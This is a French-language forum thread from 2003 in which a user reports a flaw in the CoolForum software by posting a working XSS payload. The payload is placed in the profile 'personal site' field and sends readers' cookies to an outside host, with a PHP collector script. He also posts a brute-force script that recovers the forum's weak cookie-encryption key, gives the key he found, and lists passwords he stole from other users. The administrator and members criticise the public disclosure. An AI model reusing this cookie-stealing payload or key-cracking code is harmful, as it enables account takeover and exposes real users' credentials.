Cool Forum

 
 
Cool Forum » Hacks et modifications » Support mods & hacks » [HACK] Envoi du kookie des utilisateurs
Connexions
1 connecté(s) sur le forum actuellement: 0 membre(s) | 1 invité(s)
 
 
 
<<Sujet précédent     Sujet suivant>>


 
 
Auteur Imprimer le topic Message

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Sujet : [HACK] Envoi du kookie des utilisateurs
Ajouté le : 23/06/2003 12:25
Message :

J'ai rentré:

"></a><script>window.open("http://thehacker.free.fr/h.php?cookie="+document.cookie)</script><a href="

dans le champ de texte "site perso".
Ainsi le cookie de tous ceux qui lisent mes messages sont envoyés sur mon site et ils peuvent être enregistrer.
Par éxemple, 'h.php' peut être:
<?
$fic=fopen("cookies.txt","r+");
$contents = fread($fic, filesize ("cookies.txt"));
fwrite($fic,"\n" . $cookie);
fclose($fic);
?>


Pour l'éviter il suffit bien sûr de filtrer un peu le champ "site perso".

*** Message édité par Securite le 23/06/2003 12:26 ***

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 23/06/2003 22:41
Message :

Bilan de l'opération, j'ai récupéré quelques mots de passe sans trop de difficultés ("guigui", "poetes", "vai3oncool"...)
Tout ça pour dire qu'il serait bien venu d'informer les utilisateurs de ce forum qu'ils s'exposent à de sérieux problemes de sécurité.
Ou alors le but est justement de publier ce qu'on appelle une "backdoor"...

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
TiGeR

Pilier

Roarr!!!

Enregistré le 16/01/2003
Messages: 3794
Non connecté

Ajouté le : 23/06/2003 22:52
Message :

Comment tu as fais pour obtenir la chaine de cryptage de Cool Forum étant donné que les mots de passe stockés dans les cookies sont cryptés avec la chaine de cryptage ?

*** Message édité par TiGeR le 23/06/2003 22:55 ***


CFP : Portail Web basé sur CF
CF Last Posts 0.8 : Derniers messages de votre CF sur votre site
Mods : Générateur de fichiers hackés pour CF

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Visitez le site de TiGeR!! Envoyer un Message Privé à TiGeR Citer ce post dans votre réponse

 
 
Cool Coyote

Pilier

Administrateur

Enregistré le 26/09/2001
Messages: 2629
Non connecté

Ajouté le : 23/06/2003 22:55
Message :

A croire qu'on ne lit pas les messages...

Je salue le fait que tu nous informes du trou de sécurité que tu as trouvé. Le problème est que ce n'est pas trés malin de le publier ici. En effet il aurait été logique de m'en informer tout d'abord par mail afin que je puisse prendre le temps de préparer un patch dans la semaine étant donné que je suis surbooké et que j'aurai pas le temps de m'en occuper avant demain ou aprés demain et que comme il va ENCORE falloir qu'on sorte ça dans l'urgence, ben on aura pas le temps de faire des tests poussés.

En gros: encore un ou deux jours à attendre avant de pouvoir sécuriser la chose et aucun test poussé afin de voir s'il n'y a pas d'autres trous.

En gros c'est bien de nous informer du problème, tu as eu une bonne réaction, mais la prochaine fois pense à ne pas l'étaler comme ça. Un patch sortira mais dans la semaine seulement, avant j'ai pas le temps...


Merci de respecter les règles d'ajout de messages !!

Avant de poser une question:

[Documentation] - [FAQ] - [Recherche]


Cool Coyote - Webmaster (me contacter)
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Cool Coyote Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 24/06/2003 10:57
Message :

Le problème est que ce n'est pas trés malin de le publier ici
C'est vrai mais en voyant "Hacks et Mods" j'ai cru qu'il sagissait d'un forum pour publier les trous de sécurité.
Parce qu'il faut savoir que pour développer un forum open source comme le votre une faut une équipe entiere dédiée uniquement à la sécurité (ex: postnuke)
faire des tests poussés
Il sagit juste de filtrer un champ de texte...
aucun test poussé afin de voir s'il n'y a pas d'autres trous.
Ho si yen a d'autres et beaucoup même ! C'est pas facile de programmer un forum sécurisé (avec autant de fonctions)! (j'en suis pas capable moi)
J'aime votre forum mais ce qui me derrange bcp c'est que qd je tape "Powered by CoolForum" sur google je trouve bcp de réponses. Et c'est autant de webmasters dont on peut récupérer les pass parce que vous avez pris le prob de la sécurité à la légère.
Vous publiez une backdoor cachée derrière un joli forum et ça c'est condamnable. C'est du hacking.

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Sujet : suite
Ajouté le : 24/06/2003 10:58
Message :

Pour répondre à TiGeR, ça n'a pas été bien long...
J'ai regardé l'algorithme de cryptage (c'est la seule fois ou j'ai eu besoin de regarder dans le code du forum...) et je me suis aperçu qu'il serait possible de retrouver la clée (plus précisément une clée qui marche, car la fonction n'est pas bijective) par brute force 2 lettres par 2 lettres. Le script PHP que j'ai utilisé était hosté sur freesurf qui a fixé le temps max d'exécution à 30 sec...

Si ça vous interesse le voici:

<?

$pass1="%257Ca%255Dl%255E%2523PpWt%2540n%25094%2540F%25032%250E4%2514aNl%2513%252A%2501%253FR%257Bx%2560%255Bm%250BsU%257E%255Ds";
$pass2="%252As%255E1Yb%2503%257FV5K1%255C%2523%251FOU%2528%2508dApG%253BJ5W%253BQ8y5Y-WwV1%2501y";

function getdecrypt($tplxt,$cle)
{
	$ctr=0;
	$decode="";
	for ($i=0;$i<strlen($tplxt);$i++)
	{
		if ($ctr==strlen($cle)) 
			$ctr=0;
		$decode.=(substr($tplxt,$i,1)) ^ (substr($cle,$ctr,1));
		$ctr++;	
	}	
	$tmp = "";
	for ($i=0;$i<strlen($decode);$i+=2) 
	{
		$tmp.= (substr($decode,$i,1))^(substr($decode,$i+1,1));
	}
	return($tmp);
}

$tmp1=rawurldecode(rawurldecode($pass1));
$tmp2=rawurldecode(rawurldecode($pass2));

for ($i=48 ; $i<123 ; $i++) {
	for ($j=48 ;$j<123 ; $j++) {
		
		$clee = "".chr($i).chr($j);
		$passwd1=getdecrypt($tmp1,$clee);
		$passwd2=getdecrypt($tmp2,$clee);

		// 01234567890123456789
		// tototatatototatatoto

		if (substr($passwd1,10,1) == "0" and substr($passwd2,10,1) == "t") { print("$clee<br>"); }


	}
}
?>

$pass1 et $pass2 sont 2 pass cryptés dont je connais la version décryptée.
J'exécute autant de fois ce script que je veut de lettres de la clée en changeant cette ligne à chaque fois:
if (substr($passwd1,10,1) == "0" and substr($passwd2,10,1) == "t") { print("$clee<br>");break; }

La clée (parmis bcp d'autres possibles) que j'ai trouvé est: Larrv9aravazneaPleij (marche pour les pass de taille < à 10)
Je ne connaissais pas grand chose en cryptage et en voyant votre forum troué de tous les cotés je me suis dit c'est l'occasion de voir comment c'est foutu. Ben j'ai été déçu lol !

Pour conclure ce que serait pas mal c'est de prévenir les utilisateurs que le forum n'est pas encore sécurisé. Donc de ne pas utiliser ce forum mais de le tester (d'ailleurs c'est le but d'une version beta...)
En tout cas bon courrage !

*** Message édité par Securite le 24/06/2003 11:00 ***

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
kingpopo

Pilier

Enregistré le 21/06/2002
Messages: 2409
Non connecté

Ajouté le : 24/06/2003 11:42
Message :

Bon, vais quand même le dire parce que ça me les casse

Y a pas d'équipe ici, ça se résume à Coyote qui fait ça après son boulot.
Y a certes des utilisitateurs qui s'y connaissent et qui fournissent un coup de main comme Glode, Tiger, Lemistral et d'autres.

Ca me fait marrer les donneurs de leçon, avant de hacker faudrait apprendre à lire hein.
Si tu veux vraiment aider, envoie un mail à Coyote quand tu trouves quelque chose et arrête d'étaler le modus et les clefs pour faire chier le monde!

La critique et la destruction, c'est l'art des faibles!

Fais donc un forum comme celui-ci (tout seul comme un grand) et on ira voir si il n'y a pas un trou!

D'ailleurs, tu peux prendre n'importe lequel des forums, tu trouveras toujours des trous!

Reste à savoir si tu veux utiliser ton temps à créer et à être utile ou continuer à détruire et à te moquer?


Cool_hébergement - Modif de Skins
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un email à kingpopo!!! Visitez le site de kingpopo!! Envoyer un Message Privé à kingpopo Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 24/06/2003 12:10
Message :

Tu n'as pas bien crompris kingpopo.
Mettez juste un msg sur la page de téléchargement qui dit que le forum n'est pas sûr et je serai content.
Mon but n'a pas été de "faire chier" mais bien de corriger une faille. Et mon probleme c'est que qd j'ai mieux regardé j'ai trouvé bcp d'autres failles. Le ponpon c'est qd j'ai tapé "Powered by CoolForum" sur google. La j'ai trouvé des kinés des programmeurs et autres qui utilisent ce forum sans savoir que c'est une backdoor.
Quand on publie une application sur le net on a une responsabilité.
Quand ces gens qui vous font confiance vont retrouvé leurs mails piratés vous serez responsables.

Fais donc un forum comme celui-ci (tout seul comme un grand) et on ira voir si il n'y a pas un trou!

J'en ai fait un. Et bien sûr qu'il a des failles de sécurité. Comme phpbb, vBulletin et les autres. Mais le miens est à usage personnel. Je ne dis pas: "tenez, utilisez donc mon forum et je viendrai peut-être faire un petit tour dans vos mails, si c'est pas un hacker qui s'en charge"
D'ailleurs, tu peux prendre n'importe lequel des forums, tu trouveras toujours des trous!
La différence c'est que les autres ont compris leur responsabilité et mettent un peu plus de bonne volonté à sécuriser leur appli. Ne pas filtrer les champ c'est même un peu gros...
Reste à savoir si tu veux utiliser ton temps à créer et à être utile ou continuer à détruire et à te moquer?
Saches que j'ai passé bcp de temps à aider les autres et à créer. Mon intention ici n'était ni de détruire ni de me moquer, mais bien d'aider. Du moins au début. Apres j'ai voulu vous démontrer que ce forum n'est vraiment pas sûr au point qu'il serait bon de le considérer comme une beta et pas autre chose.
La critique et la destruction, c'est l'art des faibles!
Ca c'est bien dit !

Allez, bonne continuation à vous :)

*** Message édité par Securite le 24/06/2003 12:12 ***

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
kingpopo

Pilier

Enregistré le 21/06/2002
Messages: 2409
Non connecté

Ajouté le : 24/06/2003 12:33
Message :

Vi, admettons, si tu as trouvé tellement de choses, fais donc un résumé à Coyote et il corrigera, ça c'est constructif!

-C'est marqué en dessous que c'est une version beta

Pour le reste, ben tu demandes que la marque de bagnole indique: "vous pouvez acheter notre nouveau model mais faut qu'on vous dise qu'elle peut vous péter à la gueule à tout moment" ouais tu vas en trouver beaucoup sur ce coup

Php** est une passoire, je vois pas chez eux: "Gaffe ce forum craint", Vbull** c'est encore pire (pas de mention non plus), on peut tous les passer en revue hein, c'est pareil.

On fait confiance à coyote parce qu'on croit en ce forum et qu'il nous plaît.

Pour le piratage, ma plainte n'ira pas chez Coyote mais au FAI du connard qui me fait chier. Arrêter de transposer vos responsabilités de hackers sur les autres, un peu facile

C'est celui qui commet l'acte qui est responsable, si tu butes ton voisin avec l'arme "trucmuche", c'est pas "trucmuche" le responsable, c'est toi!


Cool_hébergement - Modif de Skins
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un email à kingpopo!!! Visitez le site de kingpopo!! Envoyer un Message Privé à kingpopo Citer ce post dans votre réponse

 
 
lemistral

Pilier

Enregistré le 30/04/2002
Messages: 1977
Non connecté

Ajouté le : 24/06/2003 14:21
Message :

C'est celui qui commet l'acte qui est responsable, si tu butes ton voisin avec l'arme "trucmuche", c'est pas "trucmuche" le responsable, c'est toi!

c'est on ne peut plus vrai lool !
et puis les "hackers" ont bien autres à faire d'intelligent comme plutot traquer les sites de pedophiles mais là ce ne sont plus de betes hackeurs mais des activistes bien plus noble .....

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à lemistral Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 24/06/2003 14:43
Message :

Ceux qui développent des trojans répondent ça aussi...
Je pense que Cool Coyote comprendra ce que j'ai voulu dire.

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
kingpopo

Pilier

Enregistré le 21/06/2002
Messages: 2409
Non connecté

Ajouté le : 24/06/2003 15:31
Message :

Certes, ceci dit c'est de la programmation comme une autre et du reste totalement légale

C'es pas toi, spécialement, qu'on vise hein

C'est celui qui l'emploie a des fins douteuses qui est responsable de ses actions!

Il n'est pas illégal de hacker un site conçu pour être hacké et installé sur un serveur privé. Comme il n'est pas illégale de te hacker toi-même

Bref, si mon voisin laisse sa porte ouverte, je ne vais pas m'installer dans son salon pour mâter la télé

Ce qu'on te reproche c'est de dénigrer bêtement CoolForum (voir tes autres posts), c'est de jeter le doute sur l'aide qu'on veut apporter (voir tes autres posts) et c'est ta façon de faire d'étaler tes trouvailles qui risquent de poser bien des problèmes à d'autres!

En d'autres termes, t'es le bienvenu si tu veux apporter une aide constructive mais tu ne l'es pas si c'est juste pour foutre le bordel.


Cool_hébergement - Modif de Skins
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un email à kingpopo!!! Visitez le site de kingpopo!! Envoyer un Message Privé à kingpopo Citer ce post dans votre réponse

 
 
Cool Coyote

Pilier

Administrateur

Enregistré le 26/09/2001
Messages: 2629
Non connecté

Ajouté le : 24/06/2003 16:30
Message :

faut une équipe entiere dédiée uniquement à la sécurité

Désolé c'est pas encore le cas

Ho si yen a d'autres et beaucoup même !

Je suis au courant d'autres trous que j'ai trouvé et qui se corrigent à mesure dans la version 0.7

Vous publiez une backdoor cachée derrière un joli forum et ça c'est condamnable. C'est du hacking.

Cette remarque par contre je ne la prend pas trés bien. Si c'est ça que tu penses passe ton chemin. Je ne me laisserai pas accuser de quoi que ce soit par qui que ce soit. Il est bien évident que ce trou est involontaire et un patch sera publié.

Mettez juste un msg sur la page de téléchargement qui dit que le forum n'est pas sûr et je serai content.

Il s'agit d'une version beta donc considérée comme non stable.

Mon but n'a pas été de "faire chier" mais bien de corriger une faille.

Oui j'ai bien compris, dans l'idée tu as eu raison et je t'en remercie, dans la pratique moins mais au moins tu le sauras pour la prochaine

tenez, utilisez donc mon forum et je viendrai peut-être faire un petit tour dans vos mails

Là j'ai vraiment l'impression que tu m'accuses et j'aime pas trop...

mettent un peu plus de bonne volonté à sécuriser leur appli

Et tous les trous par injection de phpBB c'est pas aussi gros ??? Le truc que t'as pas compris c'est que je développe ce forum à mes heures perdues, je n'ai pas la prétention ni l'équipe de VBulletin ou de phpBB. Donc forcément ça prend du temps et des fois des choses idiotes m'échappent, des trous comme celui-ci ou des bugs à la con. Ici c'est pas une usine, on essaye juste d'avoir une bonne ambiance et des utilisateurs qui participent au développement en apportant leurs idées, rapports de bugs ou comme toi les problèmes de sécurité. Si j'étais payé à développer le forum 8H par jour forcément il serait nettement plus aboutit, c'est normal...

qu'il serait bon de le considérer comme une beta et pas autre chose.

Qui a dit le contraire ???

Ceux qui développent des trojans répondent ça aussi...
Je pense que Cool Coyote comprendra ce que j'ai voulu dire.

Je vais vraiment finir par croire que tu penses que c'est fait exprès et ça me plaît de moins en moins... Tu n'imagines même pas le nombre de membres qui me font confiance et qui font confiance à tous ceux qui aident en donnant carrément leurs pass FTP pour qu'on les aide quand vraiment ils n'y arrivent pas. Personne ne s'est jamais plaind car personne n'en a jamais profité et j'ai toujours supprimé les pass qui m'avaient été confiés.

Pour conclure, je dirai que si tu désires continuer à participer au développement tu es le bienvenu, si par contre tu penses réellement que tout ça est fait exprès pour que j'aille ensuite pirater les comptes de X ou de Y, je préfère que tu passes ton chemin car ça ne m'intéresse pas. En espérant plutôt te voir faire partie de la communauté...


Merci de respecter les règles d'ajout de messages !!

Avant de poser une question:

[Documentation] - [FAQ] - [Recherche]


Cool Coyote - Webmaster (me contacter)
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Cool Coyote Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 24/06/2003 17:38
Message :

C'était plus une provocation maladroite qu'une conviction Cool Coyote. Je ne pense pas que le but de votre travail soit de répandre une backdoor sur le net.

Si j'ai été si maladroit c'est que quand j'ai posté ma faille je croyais être sur un forum en phase de tests avec de nombreux reports de failles et au lieu de ça je me rends compte que les sujets qui commencent par [HACK] sont en fait des modifs et que le forum est déja publié comme si il était terminé.
C'est ça qui m'a étonné.
Si j'avais vu un message d'avertissement sur la page de téléchargement disant que "version beta" = "à ne pas utiliser mais à débuger" j'aurais continué mes investigations en étant heureux d'aider à développer ce forum qui du point de vue graphisme/fonctionnalités rivalise avec le phpbb et les autres.
J'aime participer à des développements open-source en plus c'est vrai que l'ambiance est "cool" ici (enfin avant que je débarque avec mes gros sabots ::p).
Voila c'est tout, j'ai pensé a tous ceux qui utilisent ce forum sans se rendre compte de ce qu'est une version beta.
Il y a assez de failles sur le net pour qu'on en rajoute pas (presque) volontairement :)
Je pense que vous connaissez déja mais au cas ou je vous donne l'adresse d'un site qui vous aidera dans votre quête périlleuse: http://www.phpsecure.info
Bonne continuation et pardon pour le (petit) dérangement occasioné

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
Securite

Nouveau

Enregistré le 23/06/2003
Messages: 15
Non connecté

Ajouté le : 24/06/2003 17:44
Message :

J'ai une question: L'algorithme de cryptage que vous utilisez, c'est vous qui l'avez écrit ? Sinon ou l'avez vous trouvé ?
Merci

*** Message édité par Securite le 24/06/2003 17:47 ***

Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Securite Citer ce post dans votre réponse

 
 
Cool Coyote

Pilier

Administrateur

Enregistré le 26/09/2001
Messages: 2629
Non connecté

Ajouté le : 24/06/2003 17:50
Message :

Y'a pas de problèmes, je préfère quand les choses se passent comme ça et que tout est clair.

Des bugs il y en a encore plein, des trous j'en ai repéré plusieurs et forcément avec les versions on essaye d'améliorer cela en fonction du temps que l'on a.

Bien évidemment dès qu'on a un rapport sur une faille, on essaye de faire en sorte de publier le patch le plus rapidement possible. Là où je te disais que ça nous empêche de faire des tests plus poussés, ce n'est pas seulement à cause d'un seul champ à filtrer, c'est clair c'est pas compliqué, c'est parce que j'en profite pour améliorer d'autres choses que j'ai repéré. Enfin bref, le principal c'est que l'on se soit expliqué et je suis sûr que tout le monde va vite redevenir trés cool.

Pour le message d'information je pensais que la mention "beta" suffisait à dire que c'était en développement et donc pas stable, apparemment non donc je penserait à ajouter un Warning sur la page de téléchargement.

Voilà, en espérant te revoir trés bientôt parmi nous afin de nous (moi d'abord cette fois ) faire part de tes découvertes


Merci de respecter les règles d'ajout de messages !!

Avant de poser une question:

[Documentation] - [FAQ] - [Recherche]


Cool Coyote - Webmaster (me contacter)
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Cool Coyote Citer ce post dans votre réponse

 
 
Cool Coyote

Pilier

Administrateur

Enregistré le 26/09/2001
Messages: 2629
Non connecté

Ajouté le : 24/06/2003 17:55
Message :

Message original: Securite
J'ai une question: L'algorithme de cryptage que vous utilisez, c'est vous qui l'avez écrit ? Sinon ou l'avez vous trouvé ?
Merci


à la base c'est partit d'une idée trouvée sur un forum (dans un post hein pas dans le code, c pas du copitage) et ensuite je l'ai concrétisée en brouillant un peu plus les pistes, mais j'avoue que je ne pensais pas qu'il serait aussi facile de le casser. Le soucis est que je ne veux pas utiliser un md5 comme phpBB car l'opération est irréversible et il n'est donc plus possible de récupérer le pass en cas d'oubli.

Je pense donc que pour l'avenir je penserai à un autre système en effet. Le principal c'est que pour l'instant ce ne soit pas en clair.


Merci de respecter les règles d'ajout de messages !!

Avant de poser une question:

[Documentation] - [FAQ] - [Recherche]


Cool Coyote - Webmaster (me contacter)
Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un Message Privé à Cool Coyote Citer ce post dans votre réponse

 
 
fusco

Nouveau

Enregistré le 19/06/2003
Messages: 8
Non connecté

Ajouté le : 28/06/2003 17:12
Message :

pour le souci du pass, c'est pas trop de le retrouver le plus important, mais plutot d'identifier l'emetteur qui te signale qu'il a perdu son pass.
Et si l'identification est confirmé tu lui envoi par mail un nouveau pass, en demandant de se reloguer avec, et de changer de suite ce nouveau pass.


j'espère avoir était clair la dessus.....
j'ai un peu de mail cette aprem.


car si tu as un code qui te permette de retrouver un pass, un petit malin sera toujours la pour débusquer le code et s'en servir a des fins ....
ce que l'on apelle un crackers


Recharger l'url avec lien direct vers ce message Imprimer le message Aller en bas de page Aller en haut de page Editez ce post (réservé aux modérateurs) Avertissez l'administrateur si le post est non conventionnel Envoyer un email à fusco!!! Envoyer un Message Privé à fusco Citer ce post dans votre réponse

 
 


<<Sujet précédent     Sujet suivant>>

 
[Contacter l'administrateur] | [Aller sur CoolForum.net]

 
[12 requêtes] - [Page générée en 0.0389 secondes]
 

Powered by CoolForum v.0.8.5 beta
Copyright ©2001-2014 CoolForum.net